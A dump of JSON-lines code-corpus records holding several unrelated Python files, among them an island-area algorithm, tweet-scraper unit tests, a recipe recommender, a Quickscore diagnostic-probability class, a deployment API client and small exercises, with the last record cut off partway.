1\r\n can_process = 0\r\n feedback = feedback + \"No column reused_doi or alt_url. \"\r\n\r\n # check whether reuse_type is identified\r\n try:\r\n if df['reuse_type'].isnull().values.any():\r\n has_error = 1\r\n feedback = feedback + \"Have empty reuse_type. \"\r\n except KeyError:\r\n has_error = 1\r\n can_process = 0\r\n feedback = feedback + \"No column reuse_type. \"\r\n\r\n # dump rows with no paper_doi (reusing DOI)\r\n try:\r\n df.dropna(axis=0, inplace=True,\r\n subset=['paper_doi'])\r\n except KeyError as err:\r\n print(err)\r\n\r\n # Normalize the DOIs\r\n try:\r\n df['paper_doi'] = [normalize_doi(x) for x in df['paper_doi']]\r\n except KeyError as err:\r\n print('In issue ', i, \", paper_doi has something wrong\")\r\n except AttributeError as err:\r\n print(\"In issue \", i, \", paper_doi has wrong entry\")\r\n has_error = 1\r\n can_process = 0\r\n feedback = feedback + \"Paper_doi has unnormal entries. \"\r\n\r\n write_row.append(has_error)\r\n write_row.append(can_process)\r\n write_row.append(feedback)\r\n\r\n writer.writerow(write_row)\r\n\r\n","repo_name":"XiaoLing941212/DoR-CSC510","sub_path":"getIssue.py","file_name":"getIssue.py","file_ext":"py","file_size_in_byte":5423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37759294439","text":"class Solution:\n # DFS\n # t: O(m * n)\n # s: O(m * n)\n def maxAreaOfIsland(self, grid: List[List[int]]) -> int:\n ROWS, COLS = len(grid), len(grid[0])\n seen = set()\n\n def dfs(r, c):\n\n if r not in range(ROWS) or c not in range(COLS) or (r, c) in seen or (r, c) != \"1\":\n return 0\n \n seen.add((r, c))\n\n return 1 + dfs(r+1, c) + dfs(r-1, c) + dfs(r, c+1) + dfs(r, c-1)\n\n area = 0\n for r in range(ROWS):\n for c in range(COLS):\n area = max(area, dfs(r, c))\n \n return area\n\n \n # t: O(m * n) \n # s: O(m * n)\n def maxAreaOfIsland(self, grid: List[List[int]]) -> int:\n \n if not grid:\n return 0\n \n ROWS, COLS = len(grid), len(grid[0])\n seen = set()\n area = 0\n\n directions = [(1, 0), (-1, 0), (0, 1), (0, -1)]\n \n def bfs(r, c):\n # process the current node\n seen.add((r, c))\n queue = collections.deque([(r, c), ])\n area_count = 1\n \n while queue:\n (r, c) = queue.popleft()\n \n # explore neighbors \n for dr, dc in directions:\n new_row, new_col = r + dr, c + dc\n \n if new_row in range(ROWS) and new_col in range(COLS) and grid[new_row][new_col] == 1 and (new_row, new_col) not in seen:\n area_count += 1\n seen.add((new_row, new_col))\n queue.append((new_row, new_col))\n \n return area_count\n \n # Loop over the matrix, start bfs from 1's but only start from not seen ones. \n for r in range(ROWS):\n for c in range(COLS):\n if grid[r][c] == 1 and (r, c) not in seen:\n area = max(area, bfs(r, c))\n \n return area\n\n\n ","repo_name":"ermantatar/Algorithms","sub_path":"Python/8_______GRAPH_______/DFS-BFS/Max_Area_of_Islands.py","file_name":"Max_Area_of_Islands.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"966475119","text":"#!/usr/bin/env python3\n\nfrom urllib import error\n\nimport unittest.mock as mock\nimport pytest\n\n# Package Imports\nimport getalltweets.scraper as ts\nimport getalltweets.criteria as tc\n\n\n@pytest.fixture\ndef criteria():\n\n tweet_crit = tc.TweetCriteria(\n username='zweipunknull',\n query='foo bar',\n number_of_tweets=42,\n language='de'\n )\n\n return tweet_crit\n\ndef test_tweetscraper():\n \"\"\"\n Default Instance\n \"\"\"\n\n tweet_scrap = ts.TweetScraper()\n\n exp_baseurl = 'https://twitter.com/i/search/timeline'\n exp_query = '?f=tweets&q={}&src=typd&{}max_position={}'\n exp_url = exp_baseurl + exp_query\n\n assert(tweet_scrap.baseurl == exp_baseurl )\n assert(tweet_scrap.query == exp_query )\n assert(tweet_scrap.url == exp_url )\n\ndef test_tweetscraper_build_url():\n \"\"\"\n Build URL Function\n \"\"\"\n\n tweet_crit = tc.TweetCriteria()\n tweet_scrap = ts.TweetScraper()\n\n # TODO: Make this a shared resource\n exp_baseurl = 'https://twitter.com/i/search/timeline'\n exp_query = '?f=tweets&q={}&src=typd&{}max_position={}'.format('QUERY', 'TYPD', 'POS')\n exp_url = exp_baseurl + exp_query\n\n assert(True)\n\ndef test_tweetscraper_build_headers():\n \"\"\"\n Build Headers Function\n \"\"\"\n\n exp_headers = [ ('Host', \"twitter.com\"),\n ('User-Agent', \"Mozilla/5.0 (Windows NT 6.1; Win64; x64)\"),\n ('Accept', \"application/json, text/javascript, */*; q=0.01\"),\n ('Accept-Language', \"de,en-US;q=0.7,en;q=0.3\"),\n ('X-Requested-With', \"XMLHttpRequest\"),\n ('Referer', 'THE_URL'),\n ('Connection', \"keep-alive\") ]\n\n tweet_scrap = ts.TweetScraper()\n act_headers = tweet_scrap.build_headers('THE_URL')\n\n assert(exp_headers == act_headers)\n\n@mock.patch('urllib.request.build_opener')\n@mock.patch('urllib.request.HTTPCookieProcessor')\ndef test_tweetscraper_scrap(mock_cookie, mock_request, criteria):\n \"\"\"\n Scrap Function\n \"\"\"\n\n mock_opener = mock.MagicMock()\n mock_response = mock.MagicMock()\n\n mock_response.read.return_value = '{}'.encode('utf8')\n mock_opener.open.return_value = mock_response\n\n mock_request.return_value = mock_opener\n\n scraper = ts.TweetScraper()\n\n cookie = 'CookieJar'\n cursor = ''\n\n scraper.scrap(criteria, cursor, cookie)\n\n assert(('Host', 'twitter.com') in mock_opener.addheaders)\n\n mock_cookie.assert_called_once_with('CookieJar')\n mock_request.assert_called_once_with(mock_cookie())\n\n mock_opener.open.assert_called_with('https://twitter.com/i/search/timeline?f=tweets&q=%20from%3Azweipunknull%20foo%20bar&src=typd&lang=de&max_position=')\n\n\n@mock.patch('urllib.request.build_opener')\n@mock.patch('urllib.request.HTTPCookieProcessor')\ndef test_tweetscraper_scrap_error(mock_cookie, mock_request, criteria):\n \"\"\"\n Scrap Function\n \"\"\"\n\n\n mock_opener = mock.MagicMock()\n mock_response = mock.MagicMock()\n\n mock_response.read.return_value = '{}'.encode('utf8')\n mock_opener.open.return_value = mock_response\n mock_opener.open.side_effect = error.HTTPError('url', 1, 'msg', 'hdr', mock.MagicMock())\n\n mock_request.return_value = mock_opener\n\n scraper = ts.TweetScraper()\n\n cookie = 'CookieJar'\n cursor = ''\n\n actual = scraper.scrap(criteria, cursor, cookie)\n\n assert(actual is None)\n","repo_name":"martialblog/getalltweets","sub_path":"tests/test_scraper.py","file_name":"test_scraper.py","file_ext":"py","file_size_in_byte":3325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12440323191","text":"import collections\nimport math\nimport warnings\n\nwarnings.filterwarnings(\"ignore\")\n\nimport gzip\nfrom collections import defaultdict\nimport pandas as pd\nfrom tqdm import tqdm\nimport random\nimport matplotlib.pyplot as plt\n\n\ndef splitDataset(datapath):\n f = gzip.open(datapath, 'rt')\n data = pd.read_csv(f)\n train, valid = data, data[400001:]\n return data, train, valid\n\n\ndata, train, valid = splitDataset(\"data/trainInteractions.csv.gz\")\n\n\n# Task 1\nrecipeCount = defaultdict(int)\ntotalCooked = 0\nfor index, row in tqdm(train.iterrows()):\n recipeCount[row['recipe_id']] += row['rating']\n totalCooked += row['rating']\nmostPopular = [(recipeCount[x], x) for x in recipeCount]\nmostPopular.sort()\nmostPopular.reverse()\n\nrecipeRatingCount = defaultdict(float)\n\n\n#\n#\n#Task 3\n\n\ndef Jaccard(s1, s2):\n numer = len(s1.intersection(s2))\n denom = len(s1.union(s2))\n return numer / denom\n\n\ndef Ochial(s1, s2):\n numer = len(s1.intersection(s2))\n denom = math.sqrt(len(s1) * len(s2))\n return numer/denom\n\n\ndef Simpson(s1, s2):\n numer = len(s1.intersection(s2))\n denom = min(len(s1), len(s2))\n return numer/denom\n\n\ndef Dice(s1, s2):\n numer = len(s1.intersection(s2)) * 2\n denom = len(s1) + len(s2)\n return numer/denom\n\n\nuserRecipe, recipeUser = defaultdict(set), defaultdict(set)\nfor index, row in tqdm(data.iterrows()):\n userRecipe[row['user_id']].add(row['recipe_id'])\n recipeUser[row['recipe_id']].add(row['user_id'])\n\n\ndef parse(f):\n for l in open(f, 'r', encoding='utf8'):\n yield eval(l)\n\n\npath = 'data/trainRecipes.json'\ntrain_dataset = list(parse(path))\npath = 'data/testRecipes.json'\ntest_dataset = list(parse(path))\nitemPerRecipe_train, recipePerItem_train = collections.defaultdict(set), collections.defaultdict(set)\nfor d in train_dataset:\n for i in d['ingredients']:\n itemPerRecipe_train[d['recipe_id']].add(i)\n recipePerItem_train[i].add(d['recipe_id'])\n\nitemPerRecipe_test, recipePerItem_test = collections.defaultdict(set), collections.defaultdict(set)\nitem = set()\nfor d in test_dataset:\n for i in d['ingredients']:\n item.add(i)\n itemPerRecipe_test[d['recipe_id']].add(i)\n recipePerItem_test[i].add(d['recipe_id'])\n\n\nreturn1 = set()\ncount = 0\n\nprint(totalCooked*0.6315)\nprint(totalCooked*0.6325)\n\nfor ic, i in mostPopular:\n count += ic\n return1.add(i)\n # if count > totalCooked * 0.6455:\n if count > totalCooked*0.6345:\n break\n#Task 5\npredictions = open(\"kaggle.txt\", 'w')\npredictions.write('user_id-recipe_id,prediction\\n')\nthresohold_up = 0.2\nthresohold_down = -1\ndef ensemble_kaggle():\n for l in tqdm(open(\"data/stub_Made.txt\")):\n u, r = l.strip().split('-')\n if u == 'user_id':\n continue\n userR = userRecipe[int(u)]\n m = 0\n # method 1\n # for recipe in userR:\n # if int(r) not in recipeUser:\n # m = max(0, m)\n # else:\n # # m = max(Jaccard(recipeUser[int(r)], recipeUser[recipe]), m)\n # m = max(Ochial(recipeUser[int(r)], recipeUser[recipe]), m)\n # # m = max(Dice(recipeUser[int(r)], recipeUser[recipe]), m)\n # if m > thresohold_up:\n # break\n\n #method 2\n # us = set()\n # for recipe in userR:\n # if int(r) not in recipeUser:\n # m = max(0, m)\n # else:\n # us = us.union(recipeUser[recipe])\n # m = max(Ochial(recipeUser[int(r)], recipeUser[recipe]), m)\n # if m > thresohold_down:\n # break\n\n # method 3\n\n # ingre_list = itemPerRecipe_test[int(r)]\n # append = set()\n # for i in ingre_list:\n # max_similarity, max_item = -1, ''\n # for it in item:\n # if it in ingre_list:\n # continue\n # sim = Jaccard(recipePerItem_train[it], recipePerItem_train[i])\n # if sim > max_similarity:\n # max_similarity, max_item = sim, it\n # append.add(max_item)\n #\n # for s in append:\n # ingre_list.add(s)\n #\n # for d in tqdm(train_dataset):\n # recipe = set(d['ingredients'])\n # sim = Jaccard(recipe, ingre_list)\n # m = max(sim, m)\n # if m > thresohold:\n # break\n\n if m > thresohold_down and int(r) in return1:\n predictions.write(u + '-' + r + \",1\\n\")\n else:\n predictions.write(u + '-' + r + \",0\\n\")\n\n # acc.append(correct / len(valid))\n return \"finish training\"\n\nprint(ensemble_kaggle())\n# predictions.close()","repo_name":"jalencato/graduate_course","sub_path":"cse258/is_recipe.py","file_name":"is_recipe.py","file_ext":"py","file_size_in_byte":4690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12485278472","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\nimport numpy as np\nimport random\nimport time\nimport sys\nfrom src import util\nimport mpmath as mpm\nmpm.mp.dps = 40\n\n\n# In[93]:\n\n\ndef _powerset(s):\n if len(s) ==0:\n yield s\n else:\n for set in _powerset(s[1:]):\n yield [s[0]]+set\n yield set\n \ndef _powerset_tuple(s):\n if len(s) == 0:\n yield s\n else:\n for set in _powerset_tuple(s[1:]):\n yield (s[0],) + set\n yield set\n\nclass Quickscore:\n\n def set_mpm_precision(self, precision):\n mpm.mp.dps = precision\n\n def __init__(self,Q=None,PD=None, onlyupdatepd = False):\n\n self.Q = Q\n self.PD = PD\n self.PD_org = np.array(PD)\n self.inverse_PD = 1-PD if PD is not None else None\n self.onlyUpdatePD = onlyupdatepd\n\n def convert_to_mpf(self):\n mpm_convert = np.vectorize(lambda x: mpm.mpf(x,))\n self.Q = mpm_convert(self.Q)\n self.PD = mpm_convert(self.PD)\n self.inverse_PD = mpm_convert(1-self.PD)\n\n def N_disease(self):\n return self.Q.shape[1]\n \n def N_findings(self):\n return self.Q.shape[0]\n\n def set_Q(self,Q):\n self.Q = Q\n \n def set_PD(self,PD):\n self.PD = PD\n\n def set_inversePD(self, invPD):\n self.inverse_PD = invPD\n \n def set_PD_org(self,PD):\n self.PD_org = PD\n\n def oneMinusPD(self, i):\n if self.onlyUpdatePD:\n return self.inverse_PD[i]\n else:\n return 1-self.PD[i]\n \n def generateRandomTables(self,nd,nf):\n self.PD = np.array([max(random.betavariate(2,20),1e-10) for i in range(nd)])\n self.PD_org = self.PD\n self.inverse_PD = 1-self.PD\n self.Q = np.array([[0 if random.random() > 0.1 else max(0,min(abs(random.gauss(0.03,0.6)),0.9)) for i in range(nd)] for i in range(nf)])\n\n def PNegativeFinding(self,negfinding):\n '''\n The probability that a single finding will be absent\n '''\n res = 1\n #For loop runs in the number of diseases\n for i in range(self.N_disease()):\n int_res = (1-self.Q[negfinding,i])*self.PD[i]+self.oneMinusPD(i)\n res = res*int_res\n return res\n\n\n def PNegativeFindings(self,*findings):\n '''\n The probability that multiple findings will be absent\n '''\n res = 1\n #Outer product\n for i in range(self.N_disease()):\n int_res = 1\n #Inner product\n for finding in findings:\n int_res = (1-self.Q[finding,i]) * int_res\n pdi = self.PD[i]\n not_pdi = self.oneMinusPD(i)\n res = res * (int_res*pdi+not_pdi)\n return res\n\n\n def PPositiveFindings(self,*findings):\n ''' \n The probability that multiple findings will be present\n '''\n findings = list(findings)\n res = 0\n for F in _powerset(findings):\n sign = (-1)**len(F)\n out_prod = 1\n for i in range(self.N_disease()):\n inn_prod = 1\n for f in F:\n inn_prod = inn_prod*(1-self.Q[f,i])\n out_prod = out_prod * ( inn_prod*self.PD[i]+(self.oneMinusPD(i)))\n res = res + sign*out_prod\n return res\n\n def probability_of_findings(self, present_findings, absent_findings, d_i = None):\n ''' \n The probability that a mixture of findings will be present or absent.\n \n If d_i is set the conditional probability of the findings given disease d_i will be returned\n '''\n res = 0\n for F in _powerset(present_findings):\n sign = (-1)**len(F)\n out_prod = 1\n for i in range(self.N_disease()):\n inn_prod = 1\n for f in F+absent_findings:\n inn_prod = inn_prod*(1-self.Q[f,i])\n\n if(i==d_i):\n out_prod = out_prod * inn_prod\n else:\n out_prod = out_prod * ( inn_prod*self.PD[i]+(self.oneMinusPD(i)))\n res = res + sign*out_prod\n return res\n\n def probability_of_findings_opt2(self, present_findings, absent_findings, d_i=None, showStatus = False):\n '''\n Implements equation 11 from paper: The probability that a mixture of findings will be present or absent.\n Only iterates over relevant disease parents.\n '''\n res = 0\n iteration = 0\n for F in _powerset(present_findings):\n sign = (-1) ** len(F)\n out_prod = 1\n for i in util.parents_of_findings(self.Q, F + absent_findings):\n inn_prod = 1\n for f in F + absent_findings:\n inn_prod = inn_prod * (1 - self.Q[f, i])\n\n if (i == d_i):\n out_prod = out_prod * inn_prod\n else:\n out_prod = out_prod * (inn_prod * self.PD[i] + (self.oneMinusPD(i)))\n res = res + sign * out_prod\n if showStatus and iteration%round((2**len(present_findings))/8)==0:\n print(iteration/(2**len(present_findings))*100,'%')\n iteration += 1\n return res\n\n def probability_of_findings_opt3(self, present_findings, absent_findings, d_i=None, showStatus = False):\n '''\n The probability that a mixture of findings will be present or absent.\n Absorbs negative findings first.\n '''\n\n local_PD = list(self.PD)\n\n\n #Absorb evidence from the negative findings\n for i in absent_findings:\n for j in util.get_diseases_related_to_finding(self.Q, i):\n local_PD[j] *= (1-self.Q[i,j])\n\n res = 0\n iteration = 0\n for F in _powerset(present_findings):\n sign = (-1) ** len(F)\n out_prod = 1\n for i in util.parents_of_findings(self.Q, F + absent_findings):\n inn_prod = 1\n for f in F:\n inn_prod = inn_prod * (1 - self.Q[f, i])\n\n if (i == d_i):\n out_prod = out_prod * inn_prod\n else:\n out_prod = out_prod * (inn_prod * local_PD[i] + (self.oneMinusPD(i)))\n res = res + sign * out_prod\n if showStatus and iteration%round((2**len(present_findings))/8)==0:\n print(iteration/(2**len(present_findings))*100,'%')\n iteration += 1\n return res\n \n def probability_of_findings_given_not_di(self, present_findings, absent_findings, d_i = None):\n ''' \n Implements equation 11 from paper: The probability that a mixture of findings will be present or absent.\n \n If d_i is set the conditional probability of the findings given disease d_i=0 (i.e. not present) will be returned\n '''\n res = 0\n for F in _powerset(present_findings):\n sign = (-1)**len(F)\n out_prod = 1\n for i in range(self.N_disease()):\n inn_prod = 1\n for f in F+absent_findings:\n inn_prod = inn_prod*(1-self.Q[f,i])\n\n if(i==d_i):\n out_prod = out_prod # * inn_prod # This is the only change compared to other method.\n else:\n out_prod = out_prod * ( inn_prod*self.PD[i]+(self.oneMinusPD(i)))\n res = res + sign*out_prod\n return res\n \n\n def posterior_d(self,present_findings, absent_findings, disease):\n ''' \n The posterior probability of disease given the findings\n '''\n num = self.probability_of_findings(present_findings, absent_findings, disease) * self.PD[disease]\n den = self.probability_of_findings(present_findings, absent_findings)\n print(den)\n if num==0 or den ==0:\n return 0\n else:\n return num/den\n \n def mple_dis_post_slow(self,diseases,present_findings, absent_findings):\n '''\n Gives posterior over each disease in diseases given the set of symptomps. Implemented in a brute force manner\n '''\n res = {}\n for i in diseases:\n res[i] = self.posterior_d(present_findings,absent_findings,i)\n return res\n \n \n # Caching strategies\n \n \n def mple_dis_post_fast(self,diseases,present_findings, absent_findings):\n '''\n Gives posterior over each disease in diseases given the set of symptomps. Implemented with a preprocessing step that caches\n some probabilities beforehand.\n '''\n res = {}\n # Preprocessing step\n P_only_di = {}\n for F in _powerset_tuple(tuple(present_findings)):\n for i in range(self.N_disease()):\n entry_F_i = 1\n for f in F+tuple(absent_findings):\n entry_F_i = entry_F_i * (1-self.Q[f,i])\n P_only_di[F,i] = entry_F_i\n\n # Calculate denominator(joint probability)\n\n den = self.probability_of_findings(list(present_findings), list(absent_findings))\n \n #Check if denominator is 0\n if den==0:\n for i in diseases:\n res[i] = 0\n else:\n # Calculate posterior for each query disease\n for i in diseases:\n res_sum = 0\n for F in _powerset_tuple(tuple(present_findings)):\n sign = (-1)**len(F)\n out_prod = 1\n for ii in range(self.N_disease()):\n if ii != i:\n out_prod = out_prod*(P_only_di[F,ii]*self.PD[ii]+(self.oneMinusPD(i)))\n else:\n out_prod = out_prod*(P_only_di[F,ii])\n res_sum = res_sum + sign*out_prod\n\n res[i] = res_sum*self.PD[i]/den\n\n\n\n return res\n\n def mple_dis_post_fast_v3(self, diseases, present_findings, absent_findings, return_finding_prob=False):\n '''\n Gives posterior over each disease in diseases given the set of symptomps. Implemented with a preprocessing step that caches\n some probabilities beforehand.\n\n This revision only iterates over relevant parents in the making of the dicitonary\n\n '''\n res = {}\n relevant_parents = util.parents_of_findings(self.Q, present_findings + absent_findings)\n # Preprocessing step\n P_only_di = {}\n dict2 = {}\n denn = 0\n for F in _powerset_tuple(tuple(present_findings)):\n F_entry = 1\n for i in relevant_parents:\n entry_F_i = 1\n for f in F + tuple(absent_findings):\n entry_F_i = entry_F_i * (1 - self.Q[f, i])\n P_only_di[F, i] = entry_F_i\n # Extra preprocessing step: For each element in the powerset, calculate the associated product. This will be saved in a dict with an entry for each element.\n F_entry = F_entry * (entry_F_i * self.PD[i] + (1 - self.PD[i]))\n # Calculate the denominator here. This is the sum (with correct sign) of the entries in dict2\n denn = denn + (-1) ** len(F) * F_entry\n dict2[F] = F_entry\n\n # Calculate denominator(joint probability)\n # Check if denominator is 0\n if denn == 0:\n print('Probability of findings is 0. Division by zero.')\n for i in diseases:\n res[i] = 0\n\n\n else:\n # Calculate posterior for each query disease\n for i in diseases:\n if i in relevant_parents:\n res_sum = 0\n for F in _powerset_tuple(tuple(present_findings)):\n sign = (-1) ** len(F)\n P_only_di[F, i]\n # for each entry in dict2 divide out the factor that is superfluous and multiply with the correct factor.\n e = (dict2[F] / (P_only_di[F, i] * self.PD[i] + (1 - self.PD[i]))) * P_only_di[F, i]\n res_sum = res_sum + sign * e\n res[i] = res_sum * self.PD[i] / denn\n else:\n res[i] = self.PD[i]\n\n if return_finding_prob == False:\n return res\n else:\n return res, denn\n \n \n \n def PPositiveFindings_sequential(self,result_old,powerset_old,find_new):\n '''Function that calculates probability of positive findings by adding them sequentially'''\n added_term=0\n \n new_sets = [s+[find_new] for s in powerset_old]\n res=0\n # Calculate contributions from new terms\n for F in new_sets:\n sign = (-1)**len(F)\n out_prod = 1\n for i in range(self.N_disease()):\n inn_prod = 1\n for f in F:\n inn_prod = inn_prod*(1-self.Q[f,i])\n out_prod = out_prod * ( inn_prod*self.PD[i]+(self.oneMinusPD(i)))\n res = res + sign*out_prod\n result_new = result_old + res\n \n powerset_new = powerset_old+new_sets\n \n return result_new,powerset_new\n\n \n def calculate_innerprod_dic(self, positive_findings,negative_findings):\n '''Calculate the inner product dictionary '''\n P_only_di = {}\n \n for F in _powerset_tuple(tuple(positive_findings)):\n for i in range(self.N_disease()):\n entry_F_i = 1\n for f in F+tuple(negative_findings):\n entry_F_i = entry_F_i * (1-self.Q[f,i])\n P_only_di[F,i] = entry_F_i\n powerset_generator = _powerset(positive_findings)\n return P_only_di, list(powerset_generator)\n\n \n def extend_ipdic_nfinding(self, dic, powerset_old, new_negative_finding, old_result):\n '''Function to updating the inner product dictionary with the information from a single negative finding'''\n res = 0\n for F in powerset_old:\n sign = (-1)**len(F)\n prod = 1\n for i in range(self.N_disease()):\n #Update dictionary entry:\n dic[tuple(F),i] = dic[tuple(F),i] * (1-self.Q[new_negative_finding,i])\n prod = prod*( dic[tuple(F),i] * self.PD[i] + (self.oneMinusPD(i)))\n res = res + sign*prod\n return dic, res\n\n \n def extend_ipdic_pfinding(self, dic, powerset_old, negative_findings,new_positive_finding, old_result):\n '''Function to update the dictionary with the new sets coming from the new finding and updating the probability result at the same time.'''\n #old_powerset_as_list = list(powerset_old)\n #new_sets = [s+[new_positive_finding] for s in old_powerset_as_list]\n new_sets = [s+[new_positive_finding] for s in powerset_old]\n added_res = 0\n for F in new_sets:\n sign = (-1)**len(F)\n prod=1\n for i in range(self.N_disease()):\n entry_F_i = 1\n for f in F+negative_findings:\n entry_F_i = entry_F_i * (1-self.Q[f,i])\n dic[tuple(F),i] = entry_F_i\n prod = prod*(entry_F_i * self.PD[i] + (self.oneMinusPD(i)))\n added_res = added_res + sign*prod\n new_powerset = list(powerset_old) + new_sets\n new_result = old_result + added_res\n return dic, new_powerset, new_result\n \n def probability_of_findings_dict_based(self, positive_findings, negative_findings, dic, powerset):\n '''Function to calculate joint probability of the findings given that the inner product dictionary dic is already calculated'''\n res = 0\n #for F in _powerset_tuple(tuple(positive_findings)):\n for F in powerset:\n sign = (-1)**len(F)\n prod = 1\n for i in range(self.N_disease()):\n #print(dic[F,i])\n #assert type(dic[F,i]) == np.float64, 'Not float'\n F = tuple(F)\n prod = prod*( dic[F,i] * self.PD[i] + (self.oneMinusPD(i)))\n res = res + sign*prod\n return res \n\n def add_finding(self, state, finding,dic = None, result = None,powerset = None, positive_findings = [], negative_findings = []):\n \n # Handle initial setup when dic and result is None\n #_________________________________________________\n \n if dic is None:\n if state == 'positive':\n dic,powerset = self.calculate_innerprod_dic([finding],[])\n positive_findings = positive_findings + [finding]\n elif state =='negative':\n dic,powerset = self.calculate_innerprod_dic([],[finding])\n negative_findings = negative_findings + [finding]\n else:\n assert False, \"State has to be negative or positive\"\n \n \n if result is None:\n pass\n result = self.probability_of_findings_dict_based([finding], [], dic, powerset) if state == 'positive' else self.probability_of_findings_dict_based([], [finding], dic, powerset)\n #_________________________________________________\n \n outer = self\n \n class resultClass:\n def res(self):\n if result is not None:\n return result\n else:\n print('Error: no result yet')\n \n def add_finding(self,state,_finding):\n if state == 'positive':\n new_dic,new_powerset,new_result = outer.extend_ipdic_pfinding(dic,powerset, negative_findings,_finding, result)\n new_positive_findings = positive_findings + [_finding]\n return outer.add_finding(_,_,dic = new_dic, result = new_result,powerset = new_powerset, positive_findings = new_positive_findings, negative_findings = negative_findings)\n if state == 'negative':\n new_dic,new_result = outer.extend_ipdic_nfinding(dic, powerset, _finding, result)\n new_negative_findings = negative_findings + [_finding]\n return outer.add_finding(_,_,dic = new_dic, result = new_result, powerset = powerset, positive_findings = positive_findings, negative_findings = new_negative_findings)\n else:\n assert False, \"State has to be negative of positive\"\n res = resultClass()\n return res\n","repo_name":"snejdwarf/CDSS","sub_path":"src/quickscore/Quickscore.py","file_name":"Quickscore.py","file_ext":"py","file_size_in_byte":18545,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"3165644271","text":"__all__ = [\n \"WBAPIUnauthorizedError\",\n \"WBAPI\"\n]\n\nimport requests\nfrom requests.exceptions import HTTPError as WBAPIHTTPError\nfrom requests.packages.urllib3.util import Retry\nfrom requests.adapters import HTTPAdapter\n\nfrom urlparse import urljoin\nfrom functools import wraps\n\n\nclass WBAPIUnauthorizedError(WBAPIHTTPError):\n pass\n\n\ndef catch_api_http_exception(f):\n @wraps(f)\n def wrapper(*args, **kwds):\n try:\n r = f(*args, **kwds)\n except WBAPIHTTPError as e:\n if e.response.status_code in [401, 403]:\n raise WBAPIUnauthorizedError(response=e.response)\n else:\n raise\n return r\n return wrapper\n\n\nclass FakeResponse(object):\n content = None\n status_code = None\n\n def json(self):\n return self.content\n\n\nclass WBAPI(object):\n def __init__(self, base_uri, connect_timeout=5, read_timeout=30):\n self.__base_uri = base_uri\n self.__api_uri = urljoin(base_uri, \"api/\")\n\n self.__session = requests.Session()\n requests_http_adapter = HTTPAdapter(\n Retry(total=10, status_forcelist=[502, 500], backoff_factor=0.5))\n self.__session.mount('https://', requests_http_adapter)\n self.__session.mount('http://', requests_http_adapter)\n\n self.__timeout = (connect_timeout, read_timeout)\n\n def get_token(self):\n try:\n return self.__session.headers['Authorization'].split()[1]\n except KeyError:\n return None\n\n def set_token(self, token):\n self.__session.headers['Authorization'] = \"Token {}\".format(token)\n\n @catch_api_http_exception\n def login(self, username, password):\n session = self.__session\n\n r = session.post(\n urljoin(self.__base_uri, \"token/\"),\n {\"username\": username, \"password\": password}, timeout=self.__timeout)\n try:\n r.raise_for_status()\n except WBAPIHTTPError as e:\n try:\n assert e.response.json()[\"non_field_errors\"][0] == \"Unable to log in with provided credentials.\"\n except:\n raise e\n fake_response = FakeResponse()\n fake_response.content = {\"details\": e.response.json()[\"non_field_errors\"][0]}\n fake_response.status_code = 401\n unauthed_exception = WBAPIUnauthorizedError(response=fake_response)\n raise unauthed_exception\n token = r.json()['token']\n self.set_token(token)\n\n @catch_api_http_exception\n def get_apps(self):\n r = self.__session.get(urljoin(self.__api_uri, \"apps/\"), timeout=self.__timeout)\n r.raise_for_status()\n apps = r.json()\n return [\n dict(a.items() + {\"stages\": {s[\"name\"]: s for s in a[\"stages\"]}}.items())\n for a in apps\n ]\n\n @catch_api_http_exception\n def get_stages(self):\n r = self.__session.get(urljoin(self.__api_uri, \"stages/\"), timeout=self.__timeout)\n r.raise_for_status()\n return r.json()\n\n @catch_api_http_exception\n def deploy_app(self, app, stage, version):\n r = self.__session.put(\n urljoin(self.__api_uri, \"apps/{}/stages/{}/version/{}/\".format(app, stage, version)),\n timeout=self.__timeout)\n r.raise_for_status()\n","repo_name":"hmrc/wristband-frontend","sub_path":"wb_api/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3302,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"41707870062","text":"shopping_list = []\n\ndef show_help():\n print(\"\\nSeparate each item with a comma\")\n print(\"Type DONE to quit, SHOW to see the current list, and HELP to get this message\")\n\ndef show_list():\n count = 1\n for item in shopping_list:\n print(\"{} -> {}\".format(count, item))\n count += 1\n\ndef prompt():\n print(\"\\nGive me a list of things you want to shop for: \")\n\nshow_help()\n\nwhile True:\n prompt()\n new_stuff = input(\">>\")\n\n if new_stuff == \"DONE\":\n print(\"\\nHere's your list:\")\n show_list()\n break\n elif new_stuff == \"HELP\":\n show_help()\n continue\n elif new_stuff == \"SHOW\":\n show_list()\n continue\n else:\n new_list = new_stuff.split(\",\")\n index = input(\"Add this at a certain spot? Press ENTER to insert at the end of the list\"\n \"\\nor give me a number to place it at a certain spot. You currently have {} items in your list: \".format(len(shopping_list)))\n if index:\n spot = int(index)-1\n for item in new_list:\n shopping_list.insert(spot, item.strip())\n spot += 1\n else:\n for item in new_list:\n shopping_list.append(item.strip())\n","repo_name":"Lumiras/Treehouse-Python-Scripts","sub_path":"Beginning_python/general_exercises/shopping_list_3.py","file_name":"shopping_list_3.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20425598805","text":"#!/usr/bin/env python\nimport roslib\nroslib.load_manifest('lia_progress')\nimport rospy\nimport numpy\nimport cv\n\nfrom sensor_msgs.msg import Image\nfrom cv_bridge.cv_bridge import CvBridge \nfrom cv_bridge.cv_bridge import CvBridgeError\nfrom lia_messages.msg import ProgressMsg\n\nclass Progress_Bar(object):\n\n def __init__(self):\n self.image_shape = (15,640,3)\n self.empty_color = (230,230,230)\n self.fill_color = (0,0,200)\n self.base_array = 255*numpy.ones(self.image_shape,dtype=numpy.uint8)\n for i in range(0,3):\n self.base_array[:,:,i] = self.empty_color[i]\n self.bridge = CvBridge()\n rospy.init_node('progress_bar')\n\n # Pulications\n self.pub = rospy.Publisher('image_progress_bar', Image)\n\n # Subscriptions\n self.sub = 